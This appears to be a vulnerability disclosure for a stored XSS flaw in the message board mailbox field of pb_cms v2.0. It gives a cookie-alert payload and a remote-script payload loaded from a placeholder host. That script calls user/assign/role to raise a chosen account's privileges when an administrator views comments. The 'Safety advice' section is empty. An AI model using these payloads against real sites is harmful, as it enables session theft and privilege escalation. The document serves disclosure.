The message board function in pb_cms v2.0 allows attackers to insert malicious XSS code into the mailbox information in the message board and trigger it in the background of the administrator.
Account is not required.
Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.
payload: <script>alert(document.cookie)</script>

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:


At the same time, this vulnerability can be used to escalate any account privileges to any role.
Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.
payload:<script src="http://xxxxx/x.js"></script>
x.js:
$.post(
"user/list", {
pageNumber: 1,
pageSize: 9999
},
function(data) {
console.log(data);
for (const index in data.rows) {
console.log(data.rows[index]);
console.log(data.rows[index].userId);
console.log(data.rows[index].username);
if (data.rows[index].username === 'test') {
$.post(
"user/assign/role", {
roleIdStr: 1,
userId: data.rows[index].userId
});
}
}
}
);
The role of the test account used for testing prior to visiting the Comment Management page:

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:


Safety advice:
登录 后才可以发表评论